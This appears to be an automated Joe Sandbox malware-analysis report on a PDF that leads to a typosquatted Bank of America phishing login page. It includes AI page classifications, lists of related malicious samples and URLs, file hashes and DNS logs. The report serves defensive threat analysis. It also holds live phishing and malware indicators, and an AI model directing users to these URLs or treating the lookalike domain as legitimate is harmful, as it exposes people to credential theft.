available"};else{e=!1;try{t=M.lineNumber\|\|M.line\|\|C[0]}catch(B){t=C[0],e=g}try{x=M.fileName\|\|M.filename\|\|M.sourceURL\|\|ZC.$googDebugFname\|\|z}catch(B){e= g,x=C[0]}P=v[35](7,"\n",M),!e&&M.lineNumber&&M.fileName&&M.stack&&M.message&&M.name?c={message:M.message,name:M.name,lineNumber:M.lineNumber,fileName:M.fileName,stack:P}:(m=M.message,m==H&&(M.constructor&&M.constructor instanceof Function?(M.constructor.name?G=M.constructor.name:(u=M.constructor,v1[u]?G=v1[u]:(N=String(u),v1[N]\|\|(D=/function\s+([^\(]+)/m.exec(N),v1[N]=D?D[1]:"[Anonymous]"),G=v1[N])),d='Unknown Error of type "'+G+r):d=C[2],m=d,typeof M[n[1]]==="function"&&Object.prototype[n[1]]!== M[n[1]]&&(m+=f+M[n[1]]())),c={message:m,name:M.name\|\|n[2],lineNumber:t,fileName:x,stack:P\|\|C[0]})}return c},function(Y,H,g,f,r,M){return((Y^69)>>((Y-3^(r=[15,2,8],12))>=Y&&(Y+5^11)<Y&&(mD.call(this),this.G=0),4)\|\|(M=Error("Invalid wire type: "+g+" (at position "+f+H)),Y<<r[1])&r[0]\|\|(M=p[41](r[2],f,H==null?H:v[21](79,H),g)),M},function(Y,H,g,f,r,M,C,D,e,d){if((Y>>1&15)==(Y-3<(d=["keyup",56,10],d[2])&&(Y>>1&15)>=1&&(nK.call(this),H&&L[40](d[1],d[0],this,H,g)),1))a:{for(C=(D=[g==typeof globalThis&& globalThis,r,g==typeof window&&window,g==typeof self&&self,g==typeof global&&global],H);C<D.length;++C)if((M=D[C])&&M[f]==Math){e=M;break a}throw Error("Cannot find global object");}return((Y\|48)==Y&&(e=w[47](28).call(768,28).padEnd(4,":")+H),(Y&23)==Y&&(e=w[15](d[2],H.id,H.name)),(Y\|40)==Y)&&c1(g,(H\|34)&-30941),e},function(Y,H,g,f,r,M,C){return(Y>>2&11)==((M=[4,32,7],(Y-M[2]\|63)<Y&&Y-9<<2>=Y&&(C=w[M[1]](9,g,H,f,r)),Y+M[0]<20&&(Y-M[2]&M[2])>=2)&&X.call(this,H),3)&&(C=document.body),Y+2>>1<Y&&(Y-M[0]^ 5)>=Y&&(C=new FH(H,f,g)),C},function(Y,H,g,f,r,M){if(((Y+(r=[3,1,"S"],2)&7)<2&&Y+4>=11&&(this.Z
URL: PDF document Model: Joe Sandbox AI	{ "brands": [ "Bank of America" ] }
	{ "brands": [ "Bank of America" ] }
URL: https://online.access.secure.bankofamerlica.com/secure/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Checking your browser before accessing this website", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://online.access.secure.bankofamerlica.com/secure/ Model: Joe Sandbox AI	{ "brands": "Cloudflare" }
	{ "brands": "Cloudflare" }
URL: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Log In to Online Banking", "prominent_button_name": "Log In", "text_input_field_labels": [ "User ID", "Password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Model: Joe Sandbox AI	{ "brands": [ "Bank of America" ] }
	{ "brands": [ "Bank of America" ] }
URL: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Log In", "text_input_field_labels": [ "User ID", "Password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Model: Joe Sandbox AI	```json{ "legit_domain": "bankofamerica.com", "classification": "wellknown", "reasons": [ "The brand 'Bank of America' is a well-known financial institution.", "The legitimate domain for Bank of America is 'bankofamerica.com'.", "The URL 'online.access.secure.bankofamerlica.com' contains a misspelling of 'bankofamerica' as 'bankofamerlica'.", "The presence of multiple subdomains and the misspelling are common phishing tactics.", "The input fields 'User ID' and 'Password' are typical targets for phishing attempts." ], "riskscore": 9} Google indexed: False
URL: online.access.secure.bankofamerlica.com Brands: Bank of America Input Fields: User ID, Password
URL: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Model: Joe Sandbox AI	{ "brands": [ "Bank of America" ] }
	{ "brands": [ "Bank of America" ] }
URL: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Log In", "text_input_field_labels": [ "User ID", "Password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Model: Joe Sandbox AI	```json{ "legit_domain": "bankofamerica.com", "classification": "wellknown", "reasons": [ "The brand 'Bank of America' is a well-known financial institution.", "The legitimate domain for Bank of America is 'bankofamerica.com'.", "The URL 'online.access.secure.bankofamerlica.com' contains a misspelling of 'bankofamerica' as 'bankofamerlica'.", "The presence of multiple subdomains and the misspelling are common phishing tactics.", "The input fields 'User ID' and 'Password' are typical targets for phishing attempts." ], "riskscore": 9} Google indexed: False
URL: online.access.secure.bankofamerlica.com Brands: Bank of America Input Fields: User ID, Password
URL: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Model: Joe Sandbox AI	{ "brands": [ "Bank of America" ] }
	{ "brands": [ "Bank of America" ] }
URL: https://www.virustotal.com/gui/home/url Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Analyse suspicious files, domains, IPs and URLs to detect malware and other breaches, automatically share them with the security community.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Model: Joe Sandbox AI	```json{ "legit_domain": "bankofamerica.com", "classification": "wellknown", "reasons": [ "The brand 'Bank of America' is a well-known financial institution.", "The legitimate domain for Bank of America is 'bankofamerica.com'.", "The provided URL 'online.access.secure.bankofamerlica.com' contains a misspelling of 'bankofamerica' as 'bankofamerlica'.", "The URL structure includes multiple subdomains which can be a tactic used in phishing to mimic legitimate URLs.", "The presence of input fields for 'User ID' and 'Password' is typical for phishing sites attempting to capture sensitive information." ], "riskscore": 9} Google indexed: False
URL: online.access.secure.bankofamerlica.com Brands: Bank of America Input Fields: User ID, Password
URL: https://www.virustotal.com/gui/home/url Model: Joe Sandbox AI	{ "brands": [ "Virustotal" ] }
	{ "brands": [ "Virustotal" ] }
URL: https://www.virustotal.com/gui/home/url Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Analyse suspicious files, domains, IPs and URLs to detect malware and other breaches, automatically share them with the security community.", "prominent_button_name": "https://online.access.secure.bankofamerica.com/login/sign-in/signOnV2Screen.go", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://www.virustotal.com/gui/home/url Model: Joe Sandbox AI	{ "brands": [ "Virustotal" ] }
	{ "brands": [ "Virustotal" ] }
URL: https://www.virustotal.com/gui/home/url Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Analyse suspicious files, domains, IPs and URLs to detect malware and other breaches, automatically share them with the security community.", "prominent_button_name": "unknown", "text_input_field_labels": [ "https://online.access.secure.bankofamerica.com/login/sign-in/signOnV2Screen.go" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://www.virustotal.com/gui/home/url Model: Joe Sandbox AI	{ "brands": [ "Virustotal" ] }
	{ "brands": [ "Virustotal" ] }
URL: https://www.virustotal.com/gui/search/https%253A%252F%252Fonline.access.secure.bankofamerlica.com%252Flogin%252Fsign-in%252FsignOnV2Screen.go Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://www.virustotal.com/gui/home/url Model: Joe Sandbox AI	```json{ "legit_domain": "virustotal.com", "classification": "known", "reasons": [ "The URL 'www.virustotal.com' matches the legitimate domain for the brand 'Virustotal'.", "Virustotal is a known brand associated with cybersecurity and malware analysis.", "The URL does not contain any suspicious elements such as misspellings, extra characters, or unusual domain extensions.", "The input fields URL 'https://online.access.secure.bankofamerica.com/login/sign-in/signOnV2Screen.go' is unrelated to the main URL and suggests a potential phishing attempt targeting Bank of America users." ], "riskscore": 3}
URL: www.virustotal.com Brands: Virustotal Input Fields: https://online.access.secure.bankofamerica.com/login/sign-in/signOnV2Screen.go
URL: https://www.virustotal.com/gui/search/https%253A%252F%252Fonline.access.secure.bankofamerlica.com%252Flogin%252Fsign-in%252FsignOnV2Screen.go Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: https://www.virustotal.com/gui/url-analysis/u-3f42fd094767b2c1dc7dba5ed47853880ec6f100eca99cb73d56daa6ac7b0f6a-1736959505 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "https://online.access.secure.bankofamerica.com/login/sign-in/SignOnV2Screen.go", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://www.virustotal.com/gui/url-analysis/u-3f42fd094767b2c1dc7dba5ed47853880ec6f100eca99cb73d56daa6ac7b0f6a-1736959505 Model: Joe Sandbox AI	```json { "brands": "unknown" }
	```json { "brands": "unknown" }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
34.54.88.138	file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip	Get hash	malicious	Unknown	Browse
34.54.88.138	http://usps.com-trackaddn.top/l	Get hash	malicious	Unknown	Browse
239.255.255.250	https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQ	Get hash	malicious	Unknown	Browse
	firstontario.docx	Get hash	malicious	Unknown	Browse
	https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082	Get hash	malicious	Unknown	Browse
	https://solve.xfzz.org/awjsx.captcha?u=c56ed68e-fc67-4e24-b8ac-6adc700e0877%20#%20%E2%9C%85%20''I%20am%20not%20a%20robot%20-%20reCAPTCHA%20Verification%20ID:%203467''	Get hash	malicious	Unknown	Browse
	ACH REMITTANCE DOCUMENT 15.01.25.xlsb	Get hash	malicious	Unknown	Browse
	https://tinyurl.com/Amconconstruction	Get hash	malicious	Unknown	Browse
	Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].eml	Get hash	malicious	HTMLPhisher	Browse
	https://bluefiles.com/fr/reader/document/2c33782e98658214c7dff875dd234fc3b9b9a60915ac1685fe35abcc657c139d	Get hash	malicious	Unknown	Browse
	https://u13762205.ct.sendgrid.net/ls/click?upn=u001.2N-2FFSd8Mh5tdTcK2pEXUToH0F5-2Fq3FDo8pnKFzcXMK24EOVQRPQXOzov3WP6TeQDbpOFMAzOhzk6g52qaRBXMg-3D-3DIjNL_PKcFXsnzduNOkTk1M1BuFSXBwpDtJ5JnfBBGS8mWfSDpSIzzZrzaRAqzsWn9I2SACyGbOCQAHofmU9ue-2Bfpl8m5UVDAXfATbU3zHgCM2w6TpOzhFbmwlUQoZzHTxRoJD6sBCzgzJz3SY7rmsp-2BquYHmL2DTOkQggmMFIfKhNPVaBf8NTmimDBPZdcr9YqjF8L6hryY10MBbjsSOUH778gw-3D-3D	Get hash	malicious	Unknown	Browse
	https://shunnarah.com/attorney/candace-t-brown	Get hash	malicious	Unknown	Browse
188.119.66.154	https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61f	Get hash	malicious	Unknown	Browse
	r#U0435d.pdf	Get hash	malicious	Unknown	Browse
	https://drive.google.com/file/d/1TF-huc4s6nOnHpT977ywO8Fj-NERebnm/view?usp=sharing_eip&ts=6786926e	Get hash	malicious	Unknown	Browse
	5diately.msg	Get hash	malicious	Unknown	Browse
	https://drive.google.com/file/d/1zySfUjQ3GqIVAlBHIX3CXdgIcWIqrMkO/view?usp=sharing_eip&ts=67645d30	Get hash	malicious	Unknown	Browse
	https://drive.google.com/file/d/1zySfUjQ3GqIVAlBHIX3CXdgIcWIqrMkO/view?usp=sharing_eil&ts=67645d30	Get hash	malicious	Unknown	Browse
	https://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9	Get hash	malicious	Unknown	Browse
	https://drive.google.com/file/d/11kk4glvCJRDeJ3XhdemRR_FFW8tGlSei/view?usp=sharing_eip&ts=67364a0b	Get hash	malicious	Unknown	Browse
	https://onlinefeature.blob.core.windows.net/plus/online.html?jd6123	Get hash	malicious	Unknown	Browse
	https://drive.google.com/file/d/18nCGMab9f1NLpGJOXakFvZYKY-28KcAU	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
plus.l.google.com	https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61f	Get hash	malicious	Unknown	Browse	142.250.185.142
	http://arthistoryteachingresources.org/2015/02/talk-to-your-profbut-how/	Get hash	malicious	Unknown	Browse	216.58.206.46
	http://sites.google.com/view/delta-1/home/	Get hash	malicious	Unknown	Browse	216.58.206.46
	527.zip	Get hash	malicious	Unknown	Browse	142.250.184.238
	527.zip	Get hash	malicious	Unknown	Browse	216.58.206.78
	https://drive.google.com/file/d/1TF-huc4s6nOnHpT977ywO8Fj-NERebnm/view?usp=sharing_eip&ts=6786926e	Get hash	malicious	Unknown	Browse	142.250.184.238
	http://www.affordablehousing.com/MaineCWL	Get hash	malicious	Unknown	Browse	142.250.184.238
	NoticeOfPayment.docx	Get hash	malicious	Unknown	Browse	172.217.16.206
	https://beinghunted.co.uk//#mark.seymour@capstonelogistics.com	Get hash	malicious	Unknown	Browse	216.58.212.174
	Absa Remittance Advice.docx	Get hash	malicious	Unknown	Browse	172.217.16.206
www.virustotal.com	file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip	Get hash	malicious	Unknown	Browse	34.54.88.138
	http://usps.com-trackaddn.top/l	Get hash	malicious	Unknown	Browse	34.54.88.138
	GLAMPITECT++LTD+(PROPOSAL).eml	Get hash	malicious	unknown	Browse	74.125.34.46
	oDisjCYpOP	Get hash	malicious	Xmrig	Browse	74.125.34.46
	exe005.exe	Get hash	malicious	Unknown	Browse	74.125.34.46
	exe005.exe	Get hash	malicious	Unknown	Browse	74.125.34.46
	https://www.virustotal.com/gui/domain/ghabovethec.info/detection#:~:text=API-,ghabovethec.info,-Registrar	Get hash	malicious	AveMaria	Browse	74.125.34.46
	test.html	Get hash	malicious	Unknown	Browse	74.125.34.46
	test.html	Get hash	malicious	Unknown	Browse	74.125.34.46
	test.html	Get hash	malicious	Unknown	Browse	74.125.34.46

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FLYNETRU	https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61f	Get hash	malicious	Unknown	Browse	188.119.66.154
	r#U0435d.pdf	Get hash	malicious	Unknown	Browse	188.119.66.154
	https://drive.google.com/file/d/1TF-huc4s6nOnHpT977ywO8Fj-NERebnm/view?usp=sharing_eip&ts=6786926e	Get hash	malicious	Unknown	Browse	188.119.66.154
	5diately.msg	Get hash	malicious	Unknown	Browse	188.119.66.154
	EQ5Vcf19u8.exe	Get hash	malicious	Socks5Systemz	Browse	188.119.66.185
	EQ5Vcf19u8.exe	Get hash	malicious	Socks5Systemz	Browse	188.119.66.185
	vwZcJ81cpN.exe	Get hash	malicious	Socks5Systemz	Browse	188.119.66.185
	vwZcJ81cpN.exe	Get hash	malicious	Socks5Systemz	Browse	188.119.66.185
	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	188.119.66.185
	gjEtERlBSv.exe	Get hash	malicious	Socks5Systemz	Browse	188.119.66.185
ATGS-MMD-ASUS	q4e7rZQEkL.dll	Get hash	malicious	Wannacry	Browse	32.240.226.1
	GeW4GzT8G8.dll	Get hash	malicious	Virut, Wannacry	Browse	51.20.135.1
	bot.x86.elf	Get hash	malicious	Unknown	Browse	32.4.81.55
	bot.spc.elf	Get hash	malicious	Unknown	Browse	51.87.249.225
	bot.mips.elf	Get hash	malicious	Unknown	Browse	34.10.122.89
	bot.m68k.elf	Get hash	malicious	Unknown	Browse	34.169.234.160
	bot.sh4.elf	Get hash	malicious	Unknown	Browse	48.69.65.45
	bot.arm7.elf	Get hash	malicious	Mirai	Browse	57.204.8.89
	bot.ppc.elf	Get hash	malicious	Unknown	Browse	50.14.145.151
	i686.elf	Get hash	malicious	Mirai	Browse	57.36.168.36

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.229552585438282
Encrypted:	false
SSDEEP:	6:iOeVT/4q2PoSc2nKuAl9OmbnIFUtEbxNJZmwCbxNDkwOoSc2nKuAl9OmbjLJ:7o/4vgSfHAahFUtqxNJ/4xND5LSfHAae
MD5:	81C6A859EFDFD10AF1511031186A58B6
SHA1:	8EF343B5BD75485E1104E03D021BC9EB8CBD7AA6
SHA-256:	8E06017457891135284C3F540EF372168B2010FF59C8A192348C356B7BDAB285
SHA-512:	C7DDC6961CF56A28C9A3F4A1185923C9AFAC501EF2A0ADAA13D39F273F761BEE0189452CB1A32026262C78936ED2D78E1FE468E7A3313EF9791B46270947264F
Malicious:	false
Reputation:	low
Preview:	2025/01/15-11:43:07.396 1920 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/15-11:43:07.398 1920 Recovering log #3.2025/01/15-11:43:07.398 1920 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 15:43:35 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	3.9771024656106184
Encrypted:	false
SSDEEP:	48:8Y2d2T52B7HoidAKZdA1rehwiZUklqehDy+3:8YPV2BoMy
MD5:	76063771F477503E748AC6D657D99728
SHA1:	6CEEB7C3D4B558E89C4227A6671D5EBE2BFCFF82
SHA-256:	A6A067F4E6C1D783BE4E17CC0D29ADBB7127C0BDD566F934A0D112DE055D490B
SHA-512:	805E9E99B07E8B0A8C97D01B673E0B8DC790F5298723C181289839C7D490EBA4CAD91DCF4CA5FBE79A0301851176FA7F43F636FD30F8B98C7781A863247A1F6F
Malicious:	false
Preview:	L..................F.@.. ...$+.,.......lg......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I/ZZ.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Zq.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V/Zq.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V/Zq............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/Zr......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............-......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

File type:	PDF document, version 1.3, 1 pages
Entropy (8bit):	6.439394777914296
TrID:	Adobe Portable Document Format (5005/1) 100.00%
File name:	DEEZI80S.pdf
File size:	69'485 bytes
MD5:	13ab8bff5a63ec4714eb396696c73873
SHA1:	2362f992df475a6ca17aefe6880f397f52e138d2
SHA256:	f73884ab8ba0ac61f8cc90095a5e7df72262348178182e739458f9370d1c4bea
SHA512:	a6df776c2d7368c9484782648da19037763f6026ef9500577afe6a5d6196f0d867b557dc6b6d34b20e66468ca9b4b60c47d8ecbbdb30f0aa3257a2b97be8fde6
SSDEEP:	1536:uzI6mYRQMbs0kgcqFo5F+l1A6sV5mm2a/dJPlzF68RSBtymey:uzI6mYOHuo5F+l1A9bmm2UJJF6tDymey
TLSH:	CE63025293CC499A719CDC9138B866CE0A8C30BA9BE5D744C6738A4AE35CA427F73D70
File Content Preview:	%PDF-1.3.%.... ReportLab Generated PDF document http://www.reportlab.com.1 0 obj.<<./F1 2 0 R.>>.endobj.2 0 obj.<<./BaseFont /Helvetica /Encoding /WinAnsiEncoding /Name /F1 /Subtype /Type1 /Type /Font.>>.endobj.3 0 obj.<<./BitsPerComponent 8 /ColorSpace /

General
Header:	%PDF-1.3
Total Entropy:	6.439395
Total Bytes:	69485
Stream Entropy:	6.419489
Stream Bytes:	67665
Entropy outside Streams:	5.236820
Bytes outside Streams:	1820
Number of EOF found:	1
Bytes after EOF:

Name	Count
obj	9
endobj	9
stream	2
endstream	2
xref	1
trailer	1
startxref	1
/Page	1
/Encrypt	0
/ObjStm	0
/URI	2
/JS	0
/JavaScript	0
/AA	0
/OpenAction	0
/AcroForm	0
/JBIG2Decode	0
/RichMedia	0
/Launch	0
/EmbeddedFile	0

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 15, 2025 17:43:20.019433022 CET	192.168.2.18	1.1.1.1	0x52c4	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:43:35.390090942 CET	192.168.2.18	1.1.1.1	0xa9a0	Standard query (0)	online.access.secure.bankofamerlica.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:43:35.390317917 CET	192.168.2.18	1.1.1.1	0xe261	Standard query (0)	online.access.secure.bankofamerlica.com	65	IN (0x0001)	false
Jan 15, 2025 17:43:38.509582043 CET	192.168.2.18	1.1.1.1	0xe454	Standard query (0)	online.access.secure.bankofamerlica.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:43:38.509731054 CET	192.168.2.18	1.1.1.1	0xb251	Standard query (0)	online.access.secure.bankofamerlica.com	65	IN (0x0001)	false
Jan 15, 2025 17:43:39.317171097 CET	192.168.2.18	1.1.1.1	0x7153	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:43:39.317485094 CET	192.168.2.18	1.1.1.1	0x964c	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 15, 2025 17:44:33.989768982 CET	192.168.2.18	1.1.1.1	0xd144	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:33.989944935 CET	192.168.2.18	1.1.1.1	0xf051	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Jan 15, 2025 17:44:34.987575054 CET	192.168.2.18	1.1.1.1	0xa2d7	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:34.987708092 CET	192.168.2.18	1.1.1.1	0x36fb	Standard query (0)	play.google.com	65	IN (0x0001)	false
Jan 15, 2025 17:44:42.851738930 CET	192.168.2.18	1.1.1.1	0xbe30	Standard query (0)	virustotal.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:42.851905107 CET	192.168.2.18	1.1.1.1	0x301b	Standard query (0)	virustotal.com	65	IN (0x0001)	false
Jan 15, 2025 17:44:43.489522934 CET	192.168.2.18	1.1.1.1	0xf279	Standard query (0)	www.virustotal.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:43.489754915 CET	192.168.2.18	1.1.1.1	0xdfed	Standard query (0)	www.virustotal.com	65	IN (0x0001)	false
Jan 15, 2025 17:44:44.143537998 CET	192.168.2.18	1.1.1.1	0x14ce	Standard query (0)	www.recaptcha.net	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:44.143871069 CET	192.168.2.18	1.1.1.1	0x9551	Standard query (0)	www.recaptcha.net	65	IN (0x0001)	false
Jan 15, 2025 17:44:45.076832056 CET	192.168.2.18	1.1.1.1	0xc4e	Standard query (0)	www.recaptcha.net	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:45.077039003 CET	192.168.2.18	1.1.1.1	0xb9ae	Standard query (0)	www.recaptcha.net	65	IN (0x0001)	false
Jan 15, 2025 17:44:49.292377949 CET	192.168.2.18	1.1.1.1	0x6820	Standard query (0)	www.virustotal.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:49.294948101 CET	192.168.2.18	1.1.1.1	0x32aa	Standard query (0)	www.virustotal.com	65	IN (0x0001)	false
Jan 15, 2025 17:44:49.632355928 CET	192.168.2.18	1.1.1.1	0xd531	Standard query (0)	recaptcha.net	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:49.632471085 CET	192.168.2.18	1.1.1.1	0xde33	Standard query (0)	recaptcha.net	65	IN (0x0001)	false
Jan 15, 2025 17:44:50.585124016 CET	192.168.2.18	1.1.1.1	0x78dc	Standard query (0)	recaptcha.net	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:50.585263014 CET	192.168.2.18	1.1.1.1	0xc84a	Standard query (0)	recaptcha.net	65	IN (0x0001)	false
Jan 15, 2025 17:44:55.003509045 CET	192.168.2.18	1.1.1.1	0xbded	Standard query (0)	recaptcha.net	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:55.003658056 CET	192.168.2.18	1.1.1.1	0x8890	Standard query (0)	recaptcha.net	65	IN (0x0001)	false
Jan 15, 2025 17:44:57.487133026 CET	192.168.2.18	1.1.1.1	0xe6e5	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:57.487267017 CET	192.168.2.18	1.1.1.1	0x259c	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 15, 2025 17:44:58.554045916 CET	192.168.2.18	1.1.1.1	0xf8d3	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:58.554212093 CET	192.168.2.18	1.1.1.1	0x23f3	Standard query (0)	www.google.com	65	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 17:43:20.026590109 CET	1.1.1.1	192.168.2.18	0x52c4	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 17:43:35.599364042 CET	1.1.1.1	192.168.2.18	0xa9a0	No error (0)	online.access.secure.bankofamerlica.com		188.119.66.154	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:43:38.694154024 CET	1.1.1.1	192.168.2.18	0xe454	No error (0)	online.access.secure.bankofamerlica.com		188.119.66.154	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:43:39.324501038 CET	1.1.1.1	192.168.2.18	0x7153	No error (0)	www.google.com		142.250.184.228	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:43:39.324672937 CET	1.1.1.1	192.168.2.18	0x964c	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 15, 2025 17:44:33.998661995 CET	1.1.1.1	192.168.2.18	0xd144	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 17:44:33.998661995 CET	1.1.1.1	192.168.2.18	0xd144	No error (0)	plus.l.google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:44:33.999114037 CET	1.1.1.1	192.168.2.18	0xf051	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 17:44:34.995301008 CET	1.1.1.1	192.168.2.18	0xa2d7	No error (0)	play.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
